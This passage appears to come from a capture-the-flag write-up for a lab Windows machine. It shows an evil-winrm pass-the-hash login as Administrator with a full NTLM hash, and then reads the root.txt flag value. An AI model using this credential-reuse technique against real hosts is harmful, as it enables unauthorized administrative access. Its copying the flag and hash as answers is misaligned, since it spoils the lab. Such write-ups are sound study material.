┌──(root㉿kali)-[/home/kali/Desktop/secretsdump.py-main]
└─# evil-winrm -i 10.10.11.42 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator

Logged in as administrator, switch to the Desktop directory, where root.txt holds the second flag.

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/13/2024 11:45 PM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
c453aa7121957348d4d4f383383f48fe

Restoring the clock

https://www.bdpnt.com/kepu/2667.html